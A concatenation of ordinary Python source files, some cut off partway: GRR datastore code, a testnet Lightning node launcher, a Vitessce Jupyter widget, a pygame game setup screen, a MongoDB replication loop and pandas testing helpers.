QUEUE_LOCK_ATTRIBUTE = "aff4:lease"
QUEUE_TASK_PREDICATE_PREFIX = "task:"
QUEUE_TASK_PREDICATE_TEMPLATE = QUEUE_TASK_PREDICATE_PREFIX + "%s"
@classmethod
def CollectionMakeURN(cls, urn, timestamp, suffix=None, subpath="Results"):
if suffix is None:
# Disallow 0 so that subtracting 1 from a normal suffix doesn't require
# special handling.
suffix = random.randint(1, DataStore.COLLECTION_MAX_SUFFIX)
result_urn = urn.Add(subpath).Add("%016x.%06x" % (timestamp, suffix))
return (result_urn, timestamp, suffix)
@classmethod
def QueueTaskIdToColumn(cls, task_id):
"""Return a predicate representing the given task."""
return DataStore.QUEUE_TASK_PREDICATE_TEMPLATE % ("%08d" % task_id)
def CollectionScanItems(self,
collection_id,
rdf_type,
after_timestamp=None,
after_suffix=None,
limit=None):
precondition.AssertType(collection_id, rdfvalue.RDFURN)
after_urn = None
if after_timestamp:
after_urn = utils.SmartStr(
self.CollectionMakeURN(
collection_id,
after_timestamp,
suffix=after_suffix or self.COLLECTION_MAX_SUFFIX)[0])
for subject, timestamp, serialized_rdf_value in self.ScanAttribute(
str(collection_id.Add("Results")),
self.COLLECTION_ATTRIBUTE,
after_urn=after_urn,
max_records=limit):
item = rdf_type.FromSerializedString(serialized_rdf_value)
item.age = timestamp
# The urn is timestamp.suffix where suffix is 6 hex digits.
suffix = int(str(subject)[-6:], 16)
yield (item, timestamp, suffix)
def CollectionReadIndex(self, collection_id):
"""Reads all index entries for the given collection.
Args:
collection_id: ID of the collection for which the indexes should be
retrieved.
Yields:
Tuples (index, ts, suffix).
"""
for (attr, value, ts) in self.ResolvePrefix(
collection_id, self.COLLECTION_INDEX_ATTRIBUTE_PREFIX):
i = int(attr[len(self.COLLECTION_INDEX_ATTRIBUTE_PREFIX):], 16)
yield (i, ts, int(value, 16))
def CollectionReadStoredTypes(self, collection_id):
for attribute, _, _ in self.ResolveRow(collection_id):
if attribute.startswith(self.COLLECTION_VALUE_TYPE_PREFIX):
yield attribute[len(self.COLLECTION_VALUE_TYPE_PREFIX):]
def CollectionReadItems(self, records):
for _, v in self.MultiResolvePrefix([
DataStore.CollectionMakeURN(record.queue_id, record.timestamp,
record.suffix, record.subpath)[0]
for record in records
], DataStore.COLLECTION_ATTRIBUTE):
_, value, timestamp = v[0]
yield (value, timestamp)
def QueueQueryTasks(self, queue, limit=1):
"""Retrieves tasks from a queue without leasing them.
This is good for a read only snapshot of the tasks.
Args:
queue: The task queue that this task belongs to, usually client.Queue()
where client is the ClientURN object you want to schedule msgs on.
limit: Number of values to fetch.
Returns:
A list of Task() objects.
"""
prefix = DataStore.QUEUE_TASK_PREDICATE_PREFIX
all_tasks = []
for _, serialized, ts in self.ResolvePrefix(
queue, prefix, timestamp=DataStore.ALL_TIMESTAMPS):
task = rdf_flows.GrrMessage.FromSerializedString(serialized)
task.leased_until = ts
all_tasks.append(task)
return all_tasks[:limit]
def LabelFetchAll(self, subject):
result = []
for attribute, _, _ in self.ResolvePrefix(subject,
self.LABEL_ATTRIBUTE_PREFIX):
result.append(attribute[len(self.LABEL_ATTRIBUTE_PREFIX):])
return sorted(result)
def FileHashIndexQuery(self, subject, target_prefix, limit=100):
"""Search the index for matches starting with target_prefix.
Args:
subject: The index to use. Should be a urn that points to the sha256
namespace.
target_prefix: The prefix to match against the index.
limit: Either a tuple of (start, limit) or a maximum number of results to
return.
Yields:
URNs of files which have the same data as this file - as read from the
index.
"""
if isinstance(limit, (tuple, list)):
start, length = limit # pylint: disable=unpacking-non-sequence
else:
start = 0
length = limit
prefix = (DataStore.FILE_HASH_TEMPLATE % target_prefix).lower()
results = self.ResolvePrefix(subject, prefix, limit=limit)
for i, (_, hit, _) in enumerate(results):
if i < start:
continue
if i >= start + length:
break
yield rdfvalue.RDFURN(hit)
def FileHashIndexQueryMultiple(self, locations, timestamp=None):
results = self.MultiResolvePrefix(
locations, DataStore.FILE_HASH_PREFIX, timestamp=timestamp)
for hash_obj, matches in results:
file_urns = []
for _, serialized_file_run, _ in matches:
file_urn = rdfvalue.RDFURN.FromSerializedString(serialized_file_run)
file_urns.append(file_urn)
yield (hash_obj, file_urns)
def AFF4FetchChildren(self, subject, timestamp=None, limit=None):
results = self.ResolvePrefix(
subject,
DataStore.AFF4_INDEX_DIR_PREFIX,
timestamp=timestamp,
limit=limit)
for predicate, _, timestamp in results:
yield (predicate[len(DataStore.AFF4_INDEX_DIR_PREFIX):], timestamp)
def AFF4MultiFetchChildren(self, subjects, timestamp=None, limit=None):
results = self.MultiResolvePrefix(
subjects,
DataStore.AFF4_INDEX_DIR_PREFIX,
timestamp=timestamp,
limit=limit)
for subject, matches in results:
children = []
for predicate, _, timestamp in matches:
children.append((predicate[len(DataStore.AFF4_INDEX_DIR_PREFIX):],
timestamp))
yield (subject, children)
class DBSubjectLock(object):
"""Provide a simple subject lock using the database.
This class should not be used directly. Its only safe to use via the
DataStore.LockRetryWrapper() above which implements correct backoff and
retry behavior.
"""
def __init__(self, data_store, subject, lease_time=None):
"""Obtain the subject lock for lease_time seconds.
This is never called directly but produced from the
DataStore.LockedSubject() factory.
Args:
data_store: A data_store handler.
subject: The name of a subject to lock.
lease_time: The minimum length of time the lock will remain valid in
seconds. Note this will be converted to usec for storage.
Raises:
ValueError: No lease time was provided.
"""
self.subject = utils.SmartStr(subject)
self.store = data_store
# expires should be stored as usec
self.expires = None
self.locked = False
if lease_time is None:
raise ValueError("Trying to lock without a lease time.")
self._Acquire(lease_time)
self.lease_time = lease_time
def __enter__(self):
return self
def __exit__(self, unused_type, unused_value, unused_traceback):
self.Release()
def _Acquire(self, lease_time):
raise NotImplementedError
def Release(self):
raise NotImplementedError
def UpdateLease(self, duration):
"""Update the lock lease time by at least the number of seconds.
Note that not all data stores implement timed locks. This method is
only useful for data stores which expire a lock after some time.
Args:
duration: The number of seconds to extend the lock lease.
"""
raise NotImplementedError
def CheckLease(self):
"""Return the time remaining on the lock in seconds."""
if not self.expires:
return 0
return max(0, self.expires / 1e6 - time.time())
def __del__(self):
try:
self.Release()
except Exception: # This can raise on cleanup pylint: disable=broad-except
pass
def ExpirationAsRDFDatetime(self):
return rdfvalue.RDFDatetime.FromSecondsSinceEpoch(self.expires / 1e6)
class DataStoreInit(registry.InitHook):
"""Initialize the data store.
Depends on the stats module being initialized.
"""
def _ListStorageOptions(self):
for name, cls in iteritems(DataStore.classes):
print("%s\t\t%s" % (name, cls.__doc__))
def Run(self):
"""Initialize the data_store."""
global DB # pylint: disable=global-statement
global REL_DB # pylint: disable=global-statement
global BLOBS # pylint: disable=global-statement
if flags.FLAGS.list_storage:
self._ListStorageOptions()
sys.exit(0)
try:
cls = DataStore.GetPlugin(config.CONFIG["Datastore.implementation"])
except KeyError:
msg = ("No Storage System %s found." %
config.CONFIG["Datastore.implementation"])
if config.CONFIG["Datastore.implementation"] == "SqliteDataStore":
msg = "The SQLite datastore is no longer supported."
print(msg)
print("Available options:")
self._ListStorageOptions()
raise ValueError(msg)
DB = cls() # pylint: disable=g-bad-name
DB.Initialize()
atexit.register(DB.Flush)
monitor_port = config.CONFIG["Monitoring.http_port"]
if monitor_port != 0:
DB.InitializeMonitorThread()
# Initialize the blobstore.
blobstore_name = config.CONFIG.Get("Blobstore.implementation")
try:
cls = blob_store.REGISTRY[blobstore_name]
except KeyError:
raise ValueError("No blob store %s found." % blobstore_name)
BLOBS = blob_store.BlobStoreValidationWrapper(cls())
# Initialize a relational DB if configured.
rel_db_name = config.CONFIG["Database.implementation"]
if not rel_db_name:
return
try:
cls = registry_init.REGISTRY[rel_db_name]
except KeyError:
raise ValueError("Database %s not found." % rel_db_name)
logging.info("Using database implementation %s", rel_db_name)
REL_DB = db.DatabaseValidationWrapper(cls())
|
try_multidae.py | from multiprocessing import Process
from paths import LND_PATH, LNCLI_PATH
from os import system
# https://lyceum-allotments.github.io/2017/03/python-and-pipes-part-6-multiple-subprocesses-and-pipes/
def run_lnd(directory):
system(
f"{LND_PATH} --bitcoin.active --bitcoin.testnet"
" --debuglevel=info --bitcoin.node=neutrino"
" --neutrino.connect=faucet.lightning.community"
f" --lnddir={directory}"
)
for d in ["nodes/alice/.lnd", "nodes/bob/.lnd"]:
p = Process(target=run_lnd, args=(d,))
p.start()
p.join()
|
widget.py | from ._version import js_version_info
import importlib.util
from urllib.parse import quote_plus
import json
# Widget dependencies
import ipywidgets as widgets
from traitlets import Unicode, Dict, Int, Bool
import time
# Server dependencies
import asyncio
from hypercorn.config import Config
from hypercorn.asyncio import serve
from starlette.applications import Starlette
from starlette.middleware import Middleware
from starlette.middleware.cors import CORSMiddleware
from threading import Thread
import socket
# See js/lib/widget.js for the frontend counterpart to this file.
MAX_PORT_TRIES = 1000
DEFAULT_PORT = 8000
def run_server_loop(app, port):
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
config = Config()
config.bind = [f"localhost:{port}"]
# As of Hypercorn 0.11.0, need to explicitly set signal handlers to a no-op
# (otherwise it will try to set signal handlers assuming it is on the main thread which throws an error)
loop.run_until_complete(serve(app, config, shutdown_trigger=lambda: asyncio.Future()))
loop.close()
def is_port_in_use(port):
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
return s.connect_ex(('localhost', port)) == 0
def get_base_url_and_port(port, next_port, proxy=False, base_url=None):
if port is None:
use_port = next_port
next_port += 1
port_tries = 1
while is_port_in_use(use_port) and port_tries < MAX_PORT_TRIES:
use_port = next_port
next_port += 1
port_tries += 1
else:
use_port = port
if base_url is None:
if proxy:
if importlib.util.find_spec('jupyter_server_proxy') is None:
raise ValueError("To use the widget through a proxy, jupyter-server-proxy must be installed.")
base_url = f"proxy/{use_port}"
else:
base_url = f"http://localhost:{use_port}"
return base_url, use_port, next_port
def serve_routes(routes, use_port):
if len(routes) > 0:
middleware = [
Middleware(CORSMiddleware, allow_origins=['*'], allow_methods=["OPTIONS", "GET"], allow_headers=['Range'])
]
app = Starlette(debug=True, routes=routes, middleware=middleware)
t = Thread(target=run_server_loop, args=(app, use_port))
t.start()
time.sleep(1)
def launch_vitessce_io(config, theme='light', port=None, base_url=None, open=True):
import webbrowser
base_url, use_port, _ = get_base_url_and_port(port, DEFAULT_PORT, base_url=base_url)
config_dict = config.to_dict(base_url=base_url)
routes = config.get_routes()
serve_routes(routes, use_port)
vitessce_url = f"http://vitessce.io/?theme={theme}&url=data:," + quote_plus(json.dumps(config_dict))
if open:
webbrowser.open(vitessce_url)
return vitessce_url
@widgets.register
class VitessceWidget(widgets.DOMWidget):
"""
A class to represent a Jupyter widget for Vitessce.
"""
# Name of the widget view class in front-end
_view_name = Unicode('VitessceView').tag(sync=True)
# Name of the widget model class in front-end
_model_name = Unicode('VitessceModel').tag(sync=True)
# Name of the front-end module containing widget view
_view_module = Unicode('vitessce-jupyter').tag(sync=True)
# Name of the front-end module containing widget model
_model_module = Unicode('vitessce-jupyter').tag(sync=True)
# Version of the front-end module containing widget view
_view_module_version = Unicode('^%s.%s.%s' % (js_version_info[0], js_version_info[1], js_version_info[2])).tag(sync=True)
# Version of the front-end module containing widget model
_model_module_version = Unicode('^%s.%s.%s' % (js_version_info[0], js_version_info[1], js_version_info[2])).tag(sync=True)
# Widget specific property.
# Widget properties are defined as traitlets. Any property tagged with `sync=True`
# is automatically synced to the frontend *any* time it changes in Python.
# It is synced back to Python from the frontend *any* time the model is touched.
config = Dict({}).tag(sync=True)
height = Int(600).tag(sync=True)
theme = Unicode('auto').tag(sync=True)
proxy = Bool(False).tag(sync=True)
next_port = DEFAULT_PORT
def __init__(self, config, height=600, theme='auto', port=None, proxy=False):
"""
Construct a new Vitessce widget.
:param config: A view config instance.
:type config: VitessceConfig
:param str theme: The theme name, either "light" or "dark". By default, "auto", which selects light or dark based on operating system preferences.
:param int height: The height of the widget, in pixels. By default, 600.
:param int port: The port to use when serving data objects on localhost. By default, 8000.
:param bool proxy: Is this widget being served through a proxy, for example with a cloud notebook (e.g. Binder)?
.. code-block:: python
:emphasize-lines: 4
from vitessce import VitessceConfig, VitessceWidget
vc = VitessceConfig.from_object(my_scanpy_object)
vw = vc.widget()
vw
"""
base_url, use_port, VitessceWidget.next_port = get_base_url_and_port(port, VitessceWidget.next_port, proxy=proxy)
config_dict = config.to_dict(base_url=base_url)
routes = config.get_routes()
super(VitessceWidget, self).__init__(config=config_dict, height=height, theme=theme, proxy=proxy)
serve_routes(routes, use_port)
def _get_coordination_value(self, coordination_type, coordination_scope):
obj = self.config['coordinationSpace'][coordination_type]
obj_scopes = list(obj.keys())
if coordination_scope != None:
if coordination_scope in obj_scopes:
return obj[coordination_scope]
else:
raise ValueError(f"The specified coordination scope '{coordination_scope}' could not be found for the coordination type '{coordination_type}'. Known coordination scopes are {obj_scopes}")
else:
if len(obj_scopes) == 1:
auto_coordination_scope = obj_scopes[0]
return obj[auto_coordination_scope]
elif len(obj_scopes) > 1:
raise ValueError(f"The coordination scope could not be automatically determined because multiple coordination scopes exist for the coordination type '{coordination_type}'. Please specify one of {obj_scopes} using the scope parameter.")
else:
raise ValueError(f"No coordination scopes were found for the coordination type '{coordination_type}'.")
def get_cell_selection(self, scope=None):
return self._get_coordination_value('cellSelection', scope)
|
Setup.py | """
Author: George Macrae
2014
"""
import pygame, pygbutton, sys
from pygame.locals import *
from socket import *
import threading
import textbox
import Matchup
import startGame
from Tkinter import Tk
from tkFileDialog import askopenfilename
FPS = 30
WINDOWWIDTH = 800
WINDOWHEIGHT = 700
WHITE = (255, 255, 255)
RED = (255, 0, 0)
BLUE = (0, 0, 255)
GREEN = (0, 255, 0)
BLACK = (0, 0, 0, 0.8)
FONT = pygame.font.SysFont("Arial", 14)
def listener(clientsocket,SCREEN):
global set_up
global op_ready
global ready
global listen
global loadGame
global lg
while True :
data = clientsocket.recv(1024)
print 'SET UP : data recv '+ str(data)
if data == 'ExitSetup':
print 'EXIT SETUP'
set_up = False
break
if data == 'OppReady':
windowBgColor = BLACK
SCREEN.fill(windowBgColor)
label = FONT.render(" ", 1, (255,255,0))
msg = FONT.render("Opponent is Ready", 1, (255,255,0))
SCREEN.blit(msg,(150,150))
SCREEN.blit(label, (100, 100))
SCREEN.blit(pygame.image.load('images/endbg.png').convert(),(0,0))
buttonExit = pygbutton.PygButton((WINDOWWIDTH/2-60, 250, 120, 30), 'back')
buttonStart = pygbutton.PygButton((WINDOWWIDTH/2-60, 50, 120, 30), 'start')
buttonExit.draw(SCREEN)
buttonStart.draw(SCREEN)
pygame.display.update()
op_ready = True
if data == 'BreakListener':
# if op_ready == True and ready == True:
listen = False
print 'break listener!!'
break
if data[:5]=='Load:':
l = data.split(':')
loadGame = l[-1]
print loadGame
if op_ready == True and ready == True:
listen = False
print 'break listener,both ready'
break
def start(clientsocket,opp,user,un):
print 'Set up'+str(threading.activeCount())
print 'opp = '+ opp
global o
o = opp
windowBgColor = BLACK
# pygame.init()
SCREEN = pygame.display.set_mode((WINDOWWIDTH, WINDOWHEIGHT))
pygame.display.set_caption('Set up')
SCREEN.fill(windowBgColor)
label = FONT.render(" ", 1, (255,255,0))
SCREEN.blit(label, (100, 100))
SCREEN.blit(pygame.image.load('images/endbg.png').convert(),(0,0))
buttonExit = pygbutton.PygButton((WINDOWWIDTH/2-60, 250, 120, 30), 'back')
buttonStart = pygbutton.PygButton((WINDOWWIDTH/2-60, 50, 120, 30), 'start')
buttonLoad = pygbutton.PygButton((WINDOWWIDTH/2-60, 100, 120,30), 'Load')
buttonLoad.draw(SCREEN)
buttonExit.draw(SCREEN)
buttonStart.draw(SCREEN)
pygame.display.update()
global listen
global set_up
global op_ready
global ready
global loadGame
loadGame = ''
listen = True
op_ready = False
set_up = True
ready = False
player1 = True
l_thread = threading.Thread(target = listener, args = (clientsocket,SCREEN))
l_thread.start()
load = None
while True :
if set_up == False:
Matchup.start(clientsocket,un)
break
if op_ready == True and ready == True and listen == False:
clientsocket.send('StartGame')
reef = clientsocket.recv(1024)
reef = reef.split(':')
print reef
print reef[2]
if reef[2] != '':
loadGame = reef[2]
startGame.main(clientsocket, opp,user,player1,reef[1],loadGame)
break
for event in pygame.event.get():
if 'click' in buttonExit.handleEvent(event) and ready == False:
print 'Back-Setup'
clientsocket.send('ExitSetup:'+opp)
clientsocket.send('ExitSetup:'+user[1:-1])
if 'click' in buttonStart.handleEvent(event) and ready == False:
ready = True
windowBgColor = BLACK
SCREEN.fill(windowBgColor)
SCREEN.blit(pygame.image.load('images/endbg.png').convert(),(0,0))
msg = FONT.render("Waiting for opponent...", 1, (0,0,0))
SCREEN.blit(msg,(150,150))
SCREEN.blit(label, (100, 100))
pygame.display.update()
clientsocket.send('Ready:'+str(opp))
if op_ready == True:
clientsocket.send('BreakListener')
player1 = False
if 'click' in buttonLoad.handleEvent(event) and ready == False:
print "load"
filename = 'hello'
Tk().withdraw()
filename = askopenfilename()
print filename == ''
if filename == '':
filename = 'HELLO'
if(filename[-4]+filename[-3]+filename[-2]+filename[-1] != '.bsh'):
print 'not a Name'
label = FONT.render("Wrong file extension - can only load .bsh", 1, (255,255,0))
SCREEN.blit(label, (100, 100))
else:
load = filename
clientsocket.send("Load:"+'/'+str(opp)+'/'+filename)
|
datamunging.py | import logging
import time
import threading
class DataMunging:
mongo = None
def __init__(self, mongo, replicator_queue):
self.mongo = mongo
self.logger = logging.getLogger(__name__)
self.replicator_queue = replicator_queue
self.lock = threading.Lock()
self.last_seqnum = 0
self.run_parser = False
def run(self, module_instance=None):
queue_thread = threading.Thread(target=self.check_queue)
queue_thread.daemon = True
queue_thread.start()
while True:
try:
queue = self.mongo.get_from_queue(100)
except Exception as e:
self.logger.error('Cannot get entries from replicator queue. Error: ' + str(e))
if queue.count() < 1:
self.logger.debug('No entries in replicator queue')
time.sleep(1)
continue
# if not self.run_parser:
# self.logger.debug('No messages from replicator queue')
# continue
to_delete = list()
for record in queue:
if module_instance is not None:
try:
doc = module_instance.run(record, self.mongo)
except Exception as e:
self.logger.error('Error during parse data with module. Error: ' + str(e))
doc = record
key = None
self.logger.debug('Event: ' + doc['event_type'])
if doc['event_type'] in ['update', 'delete']:
self.logger.debug('Event: ' + doc['event_type'])
try:
key = self.mongo.get_primary_key(doc['table'], doc['schema'])
self.logger.debug(key)
except Exception as e:
self.logger.error('Cannot get primary key for table ' + doc['table'] +
' in schema ' + doc['schema'] + '. Error: ' + str(e))
if doc['event_type'] == 'insert':
try:
self.mongo.insert(doc['values'], doc['schema'], doc['table'])
to_delete.append(str(doc['_id']))
self.last_seqnum = doc['seqnum']
except Exception as e:
self.logger.error('Cannot insert document into collection ' + doc['table'] +
' db ' + doc['schema'] + ' Error: ' + str(e))
elif doc['event_type'] == 'update':
if key is None:
primary_key = doc['values']['before']
else:
primary_key = dict()
for k in key['primary_key']:
primary_key[k] = str(doc['values']['after'][k])
try:
self.mongo.update(doc['values']['after'], doc['schema'], doc['table'], primary_key)
to_delete.append(doc['_id'])
self.last_seqnum = doc['seqnum']
except Exception as e:
self.logger.error('Cannot update document ' + str(doc['_id']) +
' into collection ' + doc['table'] +
' db ' + doc['schema'] + ' Error: ' + str(e))
elif doc['event_type'] == 'delete':
if key is not None:
primary_key = dict()
for k in key['primary_key']:
primary_key[k] = str(doc['values'][k])
else:
primary_key = None
try:
self.mongo.delete(doc=doc['values'], schema=doc['schema'], collection=doc['table'],
primary_key=primary_key)
to_delete.append(doc['_id'])
self.last_seqnum = doc['seqnum']
except Exception as e:
self.logger.error('Cannot delete document ' + str(doc['_id']) +
' into collection ' + doc['table'] +
' db ' + doc['schema'] + ' Error: ' + str(e))
self.logger.debug('Delete records: ' + str(to_delete))
for queue_id in to_delete:
try:
self.mongo.delete_from_queue({'_id': queue_id})
except Exception as e:
self.logger.error('Cannot delete document from queue Error: ' + str(e))
time.sleep(5)
def check_queue(self):
self.logger.info('Start QueueMonitor')
while True:
if not self.replicator_queue.empty():
try:
self.logger.debug('Try to read from replicator queue')
msg_queue = self.replicator_queue.get()
self.logger.debug('Read from replicator queue')
self.manage_replicator_msg(msg_queue)
self.logger.debug('Replicator message managed')
except Exception as e:
self.logger.error('Cannot read and manage replicator message. Error: ' + str(e))
time.sleep(.1)
def manage_replicator_msg(self, msg):
with self.lock:
self.logger.debug('Message from queue')
self.logger.debug(msg)
self.logger.debug('Last seqnum: ' + str(self.last_seqnum))
if msg['seqnum'] > self.last_seqnum:
self.logger.debug('new entries in queue')
self.run_parser = True
else:
self.logger.debug('NO new entries in queue')
self.run_parser = False
|
testing.py | import bz2
from collections import Counter
from contextlib import contextmanager
from datetime import datetime
from functools import wraps
import gzip
import os
from shutil import rmtree
import string
import tempfile
from typing import Union, cast
import warnings
import zipfile
import numpy as np
from numpy.random import rand, randn
from pandas._config.localization import ( # noqa:F401
can_set_locale,
get_locales,
set_locale,
)
import pandas._libs.testing as _testing
from pandas.compat import _get_lzma_file, _import_lzma
from pandas.core.dtypes.common import (
is_bool,
is_categorical_dtype,
is_datetime64_dtype,
is_datetime64tz_dtype,
is_extension_array_dtype,
is_interval_dtype,
is_list_like,
is_number,
is_period_dtype,
is_sequence,
is_timedelta64_dtype,
needs_i8_conversion,
)
from pandas.core.dtypes.missing import array_equivalent
import pandas as pd
from pandas import (
Categorical,
CategoricalIndex,
DataFrame,
DatetimeIndex,
Index,
IntervalIndex,
MultiIndex,
RangeIndex,
Series,
bdate_range,
)
from pandas.core.algorithms import take_1d
from pandas.core.arrays import (
DatetimeArray,
ExtensionArray,
IntervalArray,
PeriodArray,
TimedeltaArray,
period_array,
)
from pandas.io.common import urlopen
from pandas.io.formats.printing import pprint_thing
lzma = _import_lzma()
N = 30
K = 4
_RAISE_NETWORK_ERROR_DEFAULT = False
# set testing_mode
_testing_mode_warnings = (DeprecationWarning, ResourceWarning)
def set_testing_mode():
# set the testing mode filters
testing_mode = os.environ.get("PANDAS_TESTING_MODE", "None")
if "deprecate" in testing_mode:
warnings.simplefilter("always", _testing_mode_warnings)
def reset_testing_mode():
# reset the testing mode filters
testing_mode = os.environ.get("PANDAS_TESTING_MODE", "None")
if "deprecate" in testing_mode:
warnings.simplefilter("ignore", _testing_mode_warnings)
set_testing_mode()
def reset_display_options():
"""
Reset the display options for printing and representing objects.
"""
pd.reset_option("^display.", silent=True)
def round_trip_pickle(obj, path=None):
"""
Pickle an object and then read it again.
Parameters
----------
obj : pandas object
The object to pickle and then re-read.
path : str, default None
The path where the pickled object is written and then read.
Returns
-------
round_trip_pickled_object : pandas object
The original object that was pickled and then re-read.
"""
if path is None:
path = "__{random_bytes}__.pickle".format(random_bytes=rands(10))
with ensure_clean(path) as path:
pd.to_pickle(obj, path)
return pd.read_pickle(path)
def round_trip_pathlib(writer, reader, path=None):
"""
Write an object to file specified by a pathlib.Path and read it back
Parameters
----------
writer : callable bound to pandas object
IO writing function (e.g. DataFrame.to_csv )
reader : callable
IO reading function (e.g. pd.read_csv )
path : str, default None
The path where the object is written and then read.
Returns
-------
round_trip_object : pandas object
The original object that was serialized and then re-read.
"""
import pytest
Path = pytest.importorskip("pathlib").Path
if path is None:
path = "___pathlib___"
with ensure_clean(path) as path:
writer(Path(path))
obj = reader(Path(path))
return obj
def round_trip_localpath(writer, reader, path=None):
"""
Write an object to file specified by a py.path LocalPath and read it back
Parameters
----------
writer : callable bound to pandas object
IO writing function (e.g. DataFrame.to_csv )
reader : callable
IO reading function (e.g. pd.read_csv )
path : str, default None
The path where the object is written and then read.
Returns
-------
round_trip_object : pandas object
The original object that was serialized and then re-read.
"""
import pytest
LocalPath = pytest.importorskip("py.path").local
if path is None:
path = "___localpath___"
with ensure_clean(path) as path:
writer(LocalPath(path))
obj = reader(LocalPath(path))
return obj
@contextmanager
def decompress_file(path, compression):
"""
Open a compressed file and return a file object
Parameters
----------
path : str
The path where the file is read from
compression : {'gzip', 'bz2', 'zip', 'xz', None}
Name of the decompression to use
Returns
-------
f : file object
"""
if compression is None:
f = open(path, "rb")
elif compression == "gzip":
f = gzip.open(path, "rb")
elif compression == "bz2":
f = bz2.BZ2File(path, "rb")
elif compression == "xz":
f = _get_lzma_file(lzma)(path, "rb")
elif compression == "zip":
zip_file = zipfile.ZipFile(path)
zip_names = zip_file.namelist()
if len(zip_names) == 1:
f = zip_file.open(zip_names.pop())
else:
raise ValueError("ZIP file {} error. Only one file per ZIP.".format(path))
else:
msg = "Unrecognized compression type: {}".format(compression)
raise ValueError(msg)
try:
yield f
finally:
f.close()
if compression == "zip":
zip_file.close()
def write_to_compressed(compression, path, data, dest="test"):
"""
Write data to a compressed file.
Parameters
----------
compression : {'gzip', 'bz2', 'zip', 'xz'}
The compression type to use.
path : str
The file path to write the data.
data : str
The data to write.
dest : str, default "test"
The destination file (for ZIP only)
Raises
------
ValueError : An invalid compression value was passed in.
"""
if compression == "zip":
import zipfile
compress_method = zipfile.ZipFile
elif compression == "gzip":
import gzip
compress_method = gzip.GzipFile
elif compression == "bz2":
import bz2
compress_method = bz2.BZ2File
elif compression == "xz":
compress_method = _get_lzma_file(lzma)
else:
msg = "Unrecognized compression type: {}".format(compression)
raise ValueError(msg)
if compression == "zip":
mode = "w"
args = (dest, data)
method = "writestr"
else:
mode = "wb"
args = (data,)
method = "write"
with compress_method(path, mode=mode) as f:
getattr(f, method)(*args)
def assert_almost_equal(
left, right, check_dtype="equiv", check_less_precise=False, **kwargs
):
"""
Check that the left and right objects are approximately equal.
By approximately equal, we refer to objects that are numbers or that
contain numbers which may be equivalent to specific levels of precision.
Parameters
----------
left : object
right : object
check_dtype : bool or {'equiv'}, default 'equiv'
Check dtype if both a and b are the same type. If 'equiv' is passed in,
then `RangeIndex` and `Int64Index` are also considered equivalent
when doing type checking.
check_less_precise : bool or int, default False
Specify comparison precision. 5 digits (False) or 3 digits (True)
after decimal points are compared. If int, then specify the number
of digits to compare.
When comparing two numbers, if the first number has magnitude less
than 1e-5, we compare the two numbers directly and check whether
they are equivalent within the specified precision. Otherwise, we
compare the **ratio** of the second number to the first number and
check whether it is equivalent to 1 within the specified precision.
"""
if isinstance(left, pd.Index):
assert_index_equal(
left,
right,
check_exact=False,
exact=check_dtype,
check_less_precise=check_less_precise,
**kwargs
)
elif isinstance(left, pd.Series):
assert_series_equal(
left,
right,
check_exact=False,
check_dtype=check_dtype,
check_less_precise=check_less_precise,
**kwargs
)
elif isinstance(left, pd.DataFrame):
assert_frame_equal(
left,
right,
check_exact=False,
check_dtype=check_dtype,
check_less_precise=check_less_precise,
**kwargs
)
else:
# Other sequences.
if check_dtype:
if is_number(left) and is_number(right):
# Do not compare numeric classes, like np.float64 and float.
pass
elif is_bool(left) and is_bool(right):
# Do not compare bool classes, like np.bool_ and bool.
pass
else:
if isinstance(left, np.ndarray) or isinstance(right, np.ndarray):
obj = "numpy array"
else:
obj = "Input"
assert_class_equal(left, right, obj=obj)
_testing.assert_almost_equal(
left,
right,
check_dtype=check_dtype,
check_less_precise=check_less_precise,
**kwargs
)
def _check_isinstance(left, right, cls):
"""
Helper method for our assert_* methods that ensures that
the two objects being compared have the right type before
proceeding with the comparison.
Parameters
----------
left : The first object being compared.
right : The second object being compared.
cls : The class type to check against.
Raises
------
AssertionError : Either `left` or `right` is not an instance of `cls`.
"""
err_msg = "{name} Expected type {exp_type}, found {act_type} instead"
cls_name = cls.__name__
if not isinstance(left, cls):
raise AssertionError(
err_msg.format(name=cls_name, exp_type=cls, act_type=type(left))
)
if not isinstance(right, cls):
raise AssertionError(
err_msg.format(name=cls_name, exp_type=cls, act_type=type(right))
)
def assert_dict_equal(left, right, compare_keys=True):
_check_isinstance(left, right, dict)
_testing.assert_dict_equal(left, right, compare_keys=compare_keys)
def randbool(size=(), p=0.5):
return rand(*size) <= p
RANDS_CHARS = np.array(list(string.ascii_letters + string.digits), dtype=(np.str_, 1))
RANDU_CHARS = np.array(
list("".join(map(chr, range(1488, 1488 + 26))) + string.digits),
dtype=(np.unicode_, 1),
)
def rands_array(nchars, size, dtype="O"):
"""Generate an array of byte strings."""
retval = (
np.random.choice(RANDS_CHARS, size=nchars * np.prod(size))
.view((np.str_, nchars))
.reshape(size)
)
if dtype is None:
return retval
else:
return retval.astype(dtype)
def randu_array(nchars, size, dtype="O"):
"""Generate an array of unicode strings."""
retval = (
np.random.choice(RANDU_CHARS, size=nchars * np.prod(size))
.view((np.unicode_, nchars))
.reshape(size)
)
if dtype is None:
return retval
else:
return retval.astype(dtype)
def rands(nchars):
"""
Generate one random byte string.
See `rands_array` if you want to create an array of random strings.
"""
return "".join(np.random.choice(RANDS_CHARS, nchars))
def randu(nchars):
"""
Generate one random unicode string.
See `randu_array` if you want to create an array of random unicode strings.
"""
return "".join(np.random.choice(RANDU_CHARS, nchars))
def close(fignum=None):
from matplotlib.pyplot import get_fignums, close as _close
if fignum is None:
for fignum in get_fignums():
_close(fignum)
else:
_close(fignum)
# -----------------------------------------------------------------------------
# contextmanager to ensure the file cleanup
@contextmanager
def ensure_clean(filename=None, return_filelike=False):
"""Gets a temporary path and agrees to remove on close.
Parameters
----------
filename : str (optional)
if None, creates a temporary file which is then removed when out of
scope. if passed, creates temporary file with filename as ending.
return_filelike : bool (default False)
if True, returns a file-like which is *always* cleaned. Necessary for
savefig and other functions which want to append extensions.
"""
filename = filename or ""
fd = None
if return_filelike:
f = tempfile.TemporaryFile(suffix=filename)
try:
yield f
finally:
f.close()
else:
# don't generate tempfile if using a path with directory specified
if len(os.path.dirname(filename)):
raise ValueError("Can't pass a qualified name to ensure_clean()")
try:
fd, filename = tempfile.mkstemp(suffix=filename)
except UnicodeEncodeError:
import pytest
pytest.skip("no unicode file names on this system")
try:
yield filename
finally:
try:
os.close(fd)
except OSError:
print(
"Couldn't close file descriptor: {fdesc} (file: {fname})".format(
fdesc=fd, fname=filename
)
)
try:
